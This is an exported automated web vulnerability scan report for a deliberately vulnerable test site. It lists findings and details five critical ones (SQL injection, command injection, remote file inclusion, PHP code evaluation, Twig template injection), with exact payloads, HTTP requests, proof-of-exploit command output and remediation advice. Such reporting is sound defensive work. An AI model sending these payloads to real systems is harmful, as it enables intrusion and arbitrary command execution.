Scan Time
Scan Duration
12/11/2020 10:50 AM
00:00:09:06
Total Requests: 7,886
Average Speed: 14.4 r/s
Risk Level:
CRITICAL
Explanation
This report is generated based on OWASP API Top Ten 2019 classification.

There are 15 more vulnerabilities that are not shown below. Please take a look at the detailed scan report to see them.

VULNERABILITIES
17
IDENTIFIED
9
CONFIRMED
5
CRITICAL
2
HIGH
3
MEDIUM
7
LOW
0
BEST PRACTICE
0
INFORMATION
Identified Vulnerabilities
 Critical
 High
 Medium
 Low
 Best Practice
 Information
TOTAL
5
2
3
7
0
0
17
Confirmed Vulnerabilities
 Critical
 High
 Medium
 Low
 Best Practice
 Information
TOTAL
5
1
2
1
0
0
9

Vulnerabilities By OWASP API Top Ten 2019

SEVERITY FILTER :
CONFIRM VULNERABILITY METHOD URL SEVERITY
API7 - SECURITY MISCONFIGURATION
Database User Has Admin Privileges GET http://php.testsparker.com/artist.php?id=-1%20OR%2017-7%3d10 HIGH
SVN Detected GET http://php.testsparker.com/.svn/all-wcprops HIGH
Open Policy Crossdomain.xml Detected GET http://php.testsparker.com/crossdomain.xml MEDIUM
Open Silverlight Client Access Policy GET http://php.testsparker.com/clientaccesspolicy.xml MEDIUM
SSL/TLS Not Implemented GET https://php.testsparker.com/ MEDIUM
Cookie Not Marked as HttpOnly GET http://php.testsparker.com/auth/internal.php LOW
Apache MultiViews Enabled HEAD http://php.testsparker.com/clientaccesspolicy LOW
Missing X-Frame-Options Header GET http://php.testsparker.com/ LOW
Programming Error Message GET http://php.testsparker.com/hello.php?name=Visitor LOW
TRACE/TRACK Method Detected TRACE http://php.testsparker.com/ LOW
Version Disclosure (Apache) GET http://php.testsparker.com/ LOW
Version Disclosure (PHP) GET http://php.testsparker.com/ LOW
API8 - INJECTION
Boolean Based SQL Injection GET http://php.testsparker.com/artist.php?id=-1%20OR%2017-7%3d10 CRITICAL
Code Evaluation (PHP) GET http://php.testsparker.com/hello.php?name=%2bprint(int)0xFFF9999-84874%3b%2f%2f CRITICAL
Code Execution via SSTI (PHP Twig) GET http://php.testsparker.com/artist.php?id=%7b%7b_self.env.registerUndefinedFilterCallback(%22system%22)%7d%7d%7b%7b_self.env.getFilter(%22SET%20%2fA%20268409241%20-%2034832%22)%7d%7d CRITICAL
Command Injection POST http://php.testsparker.com/nslookup.php CRITICAL
Remote File Inclusion GET http://php.testsparker.com/process.php?file=http%3a%2f%2fr87.com%2fn%3f%00.nsp CRITICAL

1. Boolean Based SQL Injection

CRITICAL
1
CONFIRMED
1

Acunetix 360 identified a Boolean-Based SQL Injection, which occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database.

This is an extremely common vulnerability and its successful exploitation can have critical implications.

Acunetix 360 confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed Acunetix 360 to identify and confirm the SQL injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, updating and deleting arbitrary data/tables from the database
  • Executing commands on the underlying operating system

Vulnerabilities

1.1. http://php.testsparker.com/artist.php?id=-1%20OR%2017-7%3d10
CONFIRMED
CONFIRMED
Method Parameter Value
GET id -1 OR 17-7=10

Proof of Exploit

Identified Database Name

sqlibench

Identified Database User

root@localhost

Identified Database Version

5.0.51b-community-nt-log
Go to the highlighted output

Request

GET /artist.php?id=-1%20OR%2017-7%3d10 HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Netsparker Enterprise

Response

Response Time (ms) : 477.7811
Total Bytes Received : 230
Body Length : 0
Is Compressed : No
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=150
Content-Type: text/html
Transfer-Encoding: chunked
Date: Thu, 12 Nov 2020 07:54:39 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><link type="text/css" href="/Generics/style.css" rel="stylesheet"/>
<body>
<div id="wrapper">

<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">

</div>
<!-- end #header --> <div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h2 class="title"><a href="artist.php#">Artist Service</a></h2>

<div style="clear: both;">&nbsp;</div>
<div class="entry">
<p>

<h3>Results: -1 OR 17-7=10</h3></br>

<table class="container"><thead><th>ID</th><th>Name</th><th>SURNAME</th><th>CREATION DATE </th></thead><tbody><tr class="odd">
<td>2 </td>
<td>NICK </td>
<td>WAHLBERG </td>
<td>2006-02-15 04:34:33 </td>
<td> </td>
</tr>
<tr class="even">
<td>3 </td>
<td>ED </td>
<td>CHASE </td>
<td>2006-02-15 04:34:33 </td>
<td> </td>
</tr>
<tr class="odd">
<td>4 </td>
<td>JENNIFER </td>
<td>DAVIS </td>
<td>2006-02-15 04:34:33 </td>
<td> </td>
</tr>
<tr class="ev

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 8:00:02 AM
The Issue was detected during the Scan. System 8/19/2020 12:01:03 PM
The Issue was detected during the Scan. System 7/7/2020 9:57:29 AM
The Issue was detected during the Scan. System 7/6/2020 7:19:04 AM
The Issue was detected during the Scan. System 7/6/2020 6:56:20 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:20:31 PM

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Use your weblogs and application logs to see if there were any previous but undetected attacks to this resource.

Remedy

The best way to protect your code against SQL injections is using parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

External References

Remedy References

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API8

CVSS 3.0 SCORE

Base10 (Critical)
Temporal10 (Critical)
Environmental10 (Critical)

CVSS Vector String

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 3.1 SCORE

Base10 (Critical)
Temporal10 (Critical)
Environmental10 (Critical)

CVSS Vector String

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

2. Command Injection

CRITICAL
1
CONFIRMED
1

Acunetix 360 identified a Command Injection, which occurs when input data is interpreted as an operating system command.

This is a highly critical issue and should be addressed as soon as possible.

Impact

An attacker can execute arbitrary commands on the system.

Vulnerabilities

2.1. http://php.testsparker.com/nslookup.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST param '& SET /A 0xFFF9999-76795 &

Proof of Exploit

tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0         24 K
System                           4                            0        300 K
smss.exe                       268                            0      1,112 K
csrss.exe                      340                            0      4,616 K
wininit.exe                    396                            0      4,428 K
csrss.exe                      404                            1      3,776 K
winlogon.exe                   432                            1      4,196 K
services.exe                   488                            0      8,188 K
lsass.exe                      504                            0     11,696 K
lsm.exe                        512                            0      5,480 K
svchost.exe                    608                            0      8,828 K
nvvsvc.exe                     672                            0      6,636 K
nvwmi64.exe                    696                            0      3,948 K
nvSCPAPISvr.exe                720                            0      5,620 K
svchost.exe                    764                            0      7,044 K
LogonUI.exe                    844                            1     14,212 K
svchost.exe                    852                            0     13,048 K
svchost.exe                    916                            0     35,172 K
svchost.exe                    976                            0     10,620 K
svchost.exe                   1012                            0      5,592 K
svchost.exe                    304                            0     16,192 K
svchost.exe                    252                            0     11,688 K
spoolsv.exe                   1156                            0     10,924 K
nvxdsync.exe                  1164                            1     12,488 K
nvwmi64.exe                   1184                            1      8,004 K
svchost.exe                   1360                            0      9,064 K
inetinfo.exe                  1388                            0     13,056 K
sqlservr.exe                  1452                            0     14,124 K
mysqld-nt.exe                 1532                            0      9,224 K
svchost.exe                   1840                            0      2,724 K
sqlbrowser.exe                1884                            0      4,208 K
sqlwriter.exe                 1936                            0      6,100 K
XenGuestAgent.exe             2028                            0     38,732 K
Ec2Config.exe                 2080                            0     53,968 K
WmiPrvSE.exe                  2192                            0      7,404 K
WmiPrvSE.exe                  2500                            0     20,520 K
svchost.exe                   2560                            0      6,352 K
svchost.exe                   2624                            0      5,500 K
VSSVC.exe                     2676                            0      6,472 K
XenDpriv.exe                  2868                            0     19,652 K
msdtc.exe                     2888                            0      7,464 K
GoogleCrashHandler.exe        3004                            0      1,036 K
GoogleCrashHandler64.exe      1336                            0        872 K
httpd.exe                     2236                            0     16,772 K
httpd.exe                      132                            0     46,248 K
cmd.exe                       2792                            0      3,360 K
conhost.exe                   2568                            0      2,664 K
PING.EXE                      2592                            0      3,504 K
cmd.exe                       1624                            0      3,392 K
conhost.exe                   2396                            0      2,676 K
tasklist.exe                  1740                            0      5,288 K
cmd.exe                       3028                            0      3,596 K
conhost.exe                   1748                            0      2,664 K
nslookup.exe                  2688                            0        128 K

ver

Microsoft Windows [Version 6.1.7601]

whoami

ip-ac1e0061pacheuser
Go to the highlighted output

Request

POST /nslookup.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
Referer: http://php.testsparker.com/nslookup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Netsparker Enterprise

param=%27%26+SET+%2fA+0xFFF9999-76795+%26

Response

Response Time (ms) : 315.8359
Total Bytes Received : 224
Body Length : 0
Is Compressed : No


>
<td class="style1" colspan="2">
</td>
</tr>
</table>
</form>
<pre>Server: ip-172-30-0-2.ec2.internal
Address: 172.30.0.2

268332446</pre> </p>
</div>
</div>
<div style="clear: both;">&nbsp;</div>
</div>
<!-- end #content -->

<div id="sidebar">
<ul>
<li>
<div id="search" >
<form method="ge

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:55:44 AM
The Issue was detected during the Scan. System 8/19/2020 11:57:01 AM
The Issue was detected during the Scan. System 7/7/2020 9:54:09 AM
The Issue was detected during the Scan. System 7/6/2020 7:10:00 AM
The Issue was detected during the Scan. System 7/6/2020 6:52:00 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:14:30 PM

Actions to Take

  1. See the remedy for solution.
  2. If possible, do not invoke system commands from the application.
  3. Find all instances of similar code and make the code changes outlined in the remedy section.

Remedy

Before invoking system commands within an application, consider using an API which allows you to separate commands and parameters. This can avoid many of the problems associated with command execution. See the external references for some examples. If this is not possible, whitelist all input and encode it in accordance with the underlying subsystem. (e.g. if it is Windows, then you need to escape from cmd.exe control characters)

Required Skills for Successful Exploitation

This is an easy issue to exploit, requiring little skill or knowledge. Most knowledgeable attackers can gain remote access over such a system within minutes.

External References

Remedy References

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API8

CVSS 3.0 SCORE

Base10 (Critical)
Temporal10 (Critical)
Environmental10 (Critical)

CVSS Vector String

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 3.1 SCORE

Base10 (Critical)
Temporal10 (Critical)
Environmental10 (Critical)

CVSS Vector String

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

3. Remote File Inclusion

CRITICAL
1
CONFIRMED
1

Acunetix 360 identified a Remote File Inclusion vulnerability on the target web application.

This occurs when a file from any location can be injected into the attacked page and included as source code for parsing and execution.

Impact

Impact may differ depending on the execution permissions of the web server user. Any included source code could be executed by the web server in the context of the web server user, hence making arbitrary code execution possible. Where the web server user has administrative privileges, full system compromise is also possible.

Vulnerabilities

3.1. http://php.testsparker.com/process.php?file=http%3a%2f%2fr87.com%2fn%3f%00.nsp
CONFIRMED
CONFIRMED
Method Parameter Value
GET file http://r87.com/n?�.nsp

Proof of Exploit

net localgroup Administrators

Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
MY
OY
The command completed successfully.

net user

User accounts for \\IP-AC1E0061

-------------------------------------------------------------------------------
Administrator            ApacheUser               Guest                    
MY                       OY                       
The command completed successfully.

tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0         24 K
System                           4                            0        300 K
smss.exe                       268                            0      1,112 K
csrss.exe                      340                            0      4,596 K
wininit.exe                    396                            0      4,428 K
csrss.exe                      404                            1      3,776 K
winlogon.exe                   432                            1      4,196 K
services.exe                   488                            0      8,192 K
lsass.exe                      504                            0     11,696 K
lsm.exe                        512                            0      5,460 K
svchost.exe                    608                            0      8,828 K
nvvsvc.exe                     672                            0      6,636 K
nvwmi64.exe                    696                            0      3,948 K
nvSCPAPISvr.exe                720                            0      5,620 K
svchost.exe                    764                            0      7,020 K
LogonUI.exe                    844                            1     14,212 K
svchost.exe                    852                            0     13,024 K
svchost.exe                    916                            0     34,936 K
svchost.exe                    976                            0     10,604 K
svchost.exe                   1012                            0      5,592 K
svchost.exe                    304                            0     16,192 K
svchost.exe                    252                            0     11,692 K
spoolsv.exe                   1156                            0     10,908 K
nvxdsync.exe                  1164                            1     12,488 K
nvwmi64.exe                   1184                            1      8,004 K
svchost.exe                   1360                            0      9,096 K
inetinfo.exe                  1388                            0     13,056 K
sqlservr.exe                  1452                            0     14,188 K
mysqld-nt.exe                 1532                            0      9,168 K
svchost.exe                   1840                            0      2,724 K
sqlbrowser.exe                1884                            0      4,208 K
sqlwriter.exe                 1936                            0      6,100 K
XenGuestAgent.exe             2028                            0     38,736 K
Ec2Config.exe                 2080                            0     53,868 K
WmiPrvSE.exe                  2192                            0      7,404 K
WmiPrvSE.exe                  2500                            0     20,480 K
svchost.exe                   2560                            0      6,352 K
svchost.exe                   2624                            0      5,500 K
VSSVC.exe                     2676                            0      6,472 K
XenDpriv.exe                  2868                            0     19,652 K
msdtc.exe                     2888                            0      7,464 K
GoogleCrashHandler.exe        3004                            0      1,036 K
GoogleCrashHandler64.exe      1336                            0        872 K
httpd.exe                     2236                            0     16,772 K
httpd.exe                      132                            0     44,264 K
cmd.exe                       1344                            0      3,352 K
conhost.exe                   1596                            0      2,668 K
tasklist.exe                  1876                            0      5,292 K

ver

Microsoft Windows [Version 6.1.7601]

whoami

ip-ac1e0061\apacheuser
Go to the highlighted output

Request

GET /process.php?file=http%3a%2f%2fr87.com%2fn%3f%00.nsp HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
Referer: http://php.testsparker.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Netsparker Enterprise

Response

Response Time (ms) : 1112.7035
Total Bytes Received : 224
Body Length : 0
Is Compressed : No
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=150
Content-Length: 1451
Content-Type: text/html
Date: Thu, 12 Nov 2020 07:52:25 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><body>
<div id="wrapper">

<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">

</div>
<!-- end #header --> NETSPARKER_F0M1-44353702950-<script>netsparkerRFI(0x066666)</script> <!-- process.php load pages from path of the website. -->
<!-- FIXME: File / directory permissions -->
<!-- end #page -->
</div>

<div id="resetbar">
This website is automatically reset at every midnight (00:00 - UTC).
</div>
<div id="footer">
<p>Copyright (c) 2010 testsparker.com. All rights reserved. Design by <a href="http://www.freecsstemplates.org/">Free CSS Templates</a>.</p>
</div> <!-- end #footer -->
</body>
</html>

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:52:37 AM
The Issue was detected during the Scan. System 8/19/2020 11:55:33 AM
The Issue was detected during the Scan. System 7/7/2020 9:52:33 AM
The Issue was detected during the Scan. System 7/6/2020 7:06:58 AM
The Issue was detected during the Scan. System 7/6/2020 6:49:28 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:11:51 PM

Remedy

  • Wherever possible, do not allow the appending of file paths as a variable. File paths should be hard-coded or selected from a small pre-defined list.
  • Where dynamic path concatenation is a major application requirement, ensure input validation is performed and that you only accept the minimum characters required - for example "a-Z0-9" - and that you filter out and do not allow characters such as ".." or "/" or "%00" (null byte) or any other similar multifunction characters.
  • It's important to limit the API to only allow inclusion from a directory or directories below a defined path.

Required Skills for Successful Exploitation

There are freely available web backdoors/shells for exploiting remote file inclusion vulnerabilities and using them requires little knowledge or attack skills. This has typically been one of the most widely leveraged web application vulnerabilities; therefore, there is a high level of information readily available to attacks on how to mount and successfully undertake these forms of attacks.

External References

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API8

CVSS 3.0 SCORE

Base10 (Critical)
Temporal10 (Critical)
Environmental10 (Critical)

CVSS Vector String

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

CVSS 3.1 SCORE

Base10 (Critical)
Temporal10 (Critical)
Environmental10 (Critical)

CVSS Vector String

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

4. Code Evaluation (PHP)

CRITICAL
1
CONFIRMED
1

Acunetix 360 identified a Code Evaluation (PHP), which occurs when input data is run as source code.

This is a highly critical issue and should be addressed as soon as possible.

Impact

An attacker can execute arbitrary PHP code on the system. The attacker may also be able to execute arbitrary system commands.

Vulnerabilities

4.1. http://php.testsparker.com/hello.php?name=%2bprint(int)0xFFF9999-84874%3b%2f%2f
CONFIRMED
CONFIRMED
Method Parameter Value
GET name +print(int)0xFFF9999-84874;//

Proof of Exploit

net localgroup Administrators

Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
MY
OY
The command completed successfully.

net user

User accounts for \IP-AC1E0061

-------------------------------------------------------------------------------
Administrator            ApacheUser               Guest                    
MY                       OY                       
The command completed successfully.

tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0         24 K
System                           4                            0        300 K
smss.exe                       268                            0      1,112 K
csrss.exe                      340                            0      4,596 K
wininit.exe                    396                            0      4,428 K
csrss.exe                      404                            1      3,776 K
winlogon.exe                   432                            1      4,196 K
services.exe                   488                            0      8,192 K
lsass.exe                      504                            0     11,700 K
lsm.exe                        512                            0      5,480 K
svchost.exe                    608                            0      8,828 K
nvvsvc.exe                     672                            0      6,636 K
nvwmi64.exe                    696                            0      3,948 K
nvSCPAPISvr.exe                720                            0      5,620 K
svchost.exe                    764                            0      7,032 K
LogonUI.exe                    844                            1     14,212 K
svchost.exe                    852                            0     13,008 K
svchost.exe                    916                            0     35,092 K
svchost.exe                    976                            0     10,604 K
svchost.exe                   1012                            0      5,592 K
svchost.exe                    304                            0     16,192 K
svchost.exe                    252                            0     11,708 K
spoolsv.exe                   1156                            0     10,908 K
nvxdsync.exe                  1164                            1     12,488 K
nvwmi64.exe                   1184                            1      8,004 K
svchost.exe                   1360                            0      9,096 K
inetinfo.exe                  1388                            0     13,056 K
sqlservr.exe                  1452                            0     14,268 K
mysqld-nt.exe                 1532                            0      9,168 K
svchost.exe                   1840                            0      2,724 K
sqlbrowser.exe                1884                            0      4,208 K
sqlwriter.exe                 1936                            0      6,100 K
XenGuestAgent.exe             2028                            0     38,736 K
Ec2Config.exe                 2080                            0     53,908 K
WmiPrvSE.exe                  2192                            0      7,404 K
WmiPrvSE.exe                  2500                            0     20,584 K
svchost.exe                   2560                            0      6,352 K
svchost.exe                   2624                            0      5,500 K
VSSVC.exe                     2676                            0      6,472 K
XenDpriv.exe                  2868                            0     19,652 K
msdtc.exe                     2888                            0      7,464 K
GoogleCrashHandler.exe        3004                            0      1,036 K
GoogleCrashHandler64.exe      1336                            0        872 K
httpd.exe                     2236                            0     16,772 K
httpd.exe                      132                            0     44,428 K
cmd.exe                       1512                            0      3,344 K
conhost.exe                   1576                            0      2,684 K
tasklist.exe                  2648                            0      5,296 K

ver

Microsoft Windows [Version 6.1.7601]

whoami

ip-ac1e0061pacheuser
Go to the highlighted output

Request

GET /hello.php?name=%2bprint(int)0xFFF9999-84874%3b%2f%2f HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
Referer: http://php.testsparker.com/process.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Netsparker Enterprise

Response

Response Time (ms) : 286.831
Total Bytes Received : 224
Body Length : 0
Is Compressed : No


page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h1 class="title"><a href="#">Hello Service </a></h1>
<p>
Hello Visitor26832436721$str = 21 +print(int)0xFFF9999-84874;//;21 </p>

<div style="clear: both;">&nbsp;</div>
<div class="entry">


</div>
</div>
<div style="clear: both;">&nbsp;</div>

History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:53:20 AM
The Issue was detected during the Scan. System 8/19/2020 11:55:49 AM
The Issue was detected during the Scan. System 7/7/2020 9:52:52 AM
The Issue was detected during the Scan. System 7/6/2020 7:07:22 AM
The Issue was detected during the Scan. System 7/6/2020 6:49:55 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:12:21 PM

Remedy

Do not accept input from end users which will be directly interpreted as source code. If this is a business requirement, validate all input to the application by removing any data that could be directly interpreted as PHP source code.

Required Skills for Successful Exploitation

This vulnerability is not difficult to leverage. PHP is a high level language for which there are vast resources available. Successful exploitation requires knowledge of the programming language, access to the source code or the ability to produce source code for use in such attacks, and minimal attack skills.

External References

CLASSIFICATION

OWASP API Top Ten 2019 OWASP API-API8

CVSS 3.0 SCORE

Base8.6 (High)
Temporal8.6 (High)
Environmental8.6 (High)

CVSS Vector String

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE

Base8.6 (High)
Temporal8.6 (High)
Environmental8.6 (High)

CVSS Vector String

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

5. Code Execution via SSTI (PHP Twig)

CRITICAL
1
CONFIRMED
1

Acunetix 360 identified a code execution which occurs when using an unintentional expression in template engine instead of string literals.

This is a highly critical issue and should be addressed as soon as possible.

Impact

An attacker can execute arbitrary code by using wrong construction in template engine tags. The attacker may also be able to execute arbitrary system commands.

Vulnerabilities

5.1. http://php.testsparker.com/artist.php?id=%7b%7b_self.env.registerUndefinedFilterCallback(%22system%22)%7d%7d%7b%7b_self.env.getFilter(%22SET%20%2fA%20268409241%20-%2034832%22)%7d%7d
CONFIRMED
CONFIRMED
Method Parameter Value
GET id {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("SET /A 268409241 - 348...

Proof of Exploit

net localgroup Administrators

Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
MY
OY
The command completed successfully.

net user

User accounts for \IP-AC1E0061

-------------------------------------------------------------------------------
Administrator            ApacheUser               Guest                    
MY                       OY                       
The command completed successfully.

tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0         24 K
System                           4                            0        300 K
smss.exe                       268                            0      1,112 K
csrss.exe                      340                            0      4,596 K
wininit.exe                    396                            0      4,428 K
csrss.exe                      404                            1      3,776 K
winlogon.exe                   432                            1      4,196 K
services.exe                   488                            0      8,188 K
lsass.exe                      504                            0     11,696 K
lsm.exe                        512                            0      5,464 K
svchost.exe                    608                            0      8,828 K
nvvsvc.exe                     672                            0      6,636 K
nvwmi64.exe                    696                            0      3,948 K
nvSCPAPISvr.exe                720                            0      5,620 K
svchost.exe                    764                            0      7,044 K
LogonUI.exe                    844                            1     14,212 K
svchost.exe                    852                            0     13,008 K
svchost.exe                    916                            0     35,084 K
svchost.exe                    976                            0     10,604 K
svchost.exe                   1012                            0      5,592 K
svchost.exe                    304                            0     16,192 K
svchost.exe                    252                            0     11,688 K
spoolsv.exe                   1156                            0     10,924 K
nvxdsync.exe                  1164                            1     12,488 K
nvwmi64.exe                   1184                            1      8,004 K
svchost.exe                   1360                            0      9,100 K
inetinfo.exe                  1388                            0     13,056 K
sqlservr.exe                  1452                            0     14,140 K
mysqld-nt.exe                 1532                            0      9,168 K
svchost.exe                   1840                            0      2,724 K
sqlbrowser.exe                1884                            0      4,208 K
sqlwriter.exe                 1936                            0      6,100 K
XenGuestAgent.exe             2028                            0     38,712 K
Ec2Config.exe                 2080                            0     53,900 K
WmiPrvSE.exe                  2192                            0      7,404 K
WmiPrvSE.exe                  2500                            0     20,520 K
svchost.exe                   2560                            0      6,352 K
svchost.exe                   2624                            0      5,500 K
VSSVC.exe                     2676                            0      6,472 K
XenDpriv.exe                  2868                            0     19,652 K
msdtc.exe                     2888                            0      7,464 K
GoogleCrashHandler.exe        3004                            0      1,036 K
GoogleCrashHandler64.exe      1336                            0        872 K
httpd.exe                     2236                            0     16,772 K
httpd.exe                      132                            0     45,864 K
cmd.exe                       1716                            0      3,348 K
conhost.exe                   2648                            0      2,668 K
tasklist.exe                  2544                            0      5,288 K

ver

Microsoft Windows [Version 6.1.7601]

whoami

ip-ac1e0061pacheuser
Go to the highlighted output

Request

GET /artist.php?id=%7b%7b_self.env.registerUndefinedFilterCallback(%22system%22)%7d%7d%7b%7b_self.env.getFilter(%22SET%20%2fA%20268409241%20-%2034832%22)%7d%7d HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=bc4e13f5120855d81669b92152ebd527
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Netsparker Enterprise

Response

Response Time (ms) : 345.6096
Total Bytes Received : 230
Body Length : 0
Is Compressed : No


<div class="post">
<h2 class="title"><a href="artist.php#">Artist Service</a></h2>

<div style="clear: both;">&nbsp;</div>
<div class="entry">
<p>

<h3>Results: 268374409268374409</h3></br>

no rows returned
</p>

</div>
</div>
<div style="clear: both;">&nbsp;</div>
</div>
<!-- end #content -->

<div id="sidebar">
<ul>
<li>


History

Message Owner Date
The Issue was detected during the Scan. System 11/12/2020 7:54:51 AM
The Issue was detected during the Scan. System 8/19/2020 11:56:37 AM
The Issue was detected during the Scan. System 7/7/2020 9:53:34 AM
The Issue was detected during the Scan. System 7/6/2020 7:08:52 AM
The Issue was detected during the Scan. System 7/6/2020 6:50:58 AM
The Issue was detected during the Scan. The State was set to   Present  System 7/5/2020 6:13:34 PM

Remedy

